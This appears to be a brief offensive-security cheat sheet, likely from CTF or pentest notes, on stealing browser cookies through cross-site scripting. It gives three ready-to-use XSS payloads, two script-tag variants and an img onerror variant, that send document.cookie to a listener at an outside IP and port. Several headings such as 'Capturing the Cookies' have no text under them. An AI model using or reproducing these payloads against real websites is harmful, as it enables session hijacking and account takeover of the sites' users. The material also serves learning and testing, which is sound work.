Stealing Cookies
Payloads
Verification with alert()
<script>
alert(document.cookie);
var i=new Image;
i.src="http://172.0.0.1:1337/?"+document.cookie;
</script>Exfiltrating cookies without alert()
<script>var i=new Image;i.src="http://172.0.0.1:1337/?"+document.cookie;</script>CTF Only Payload
<img src=x onerror=this.src='http://172.0.0.1:1337/?'+document.cookie;>My Preferred Method
Capturing the Cookies
References
Last updated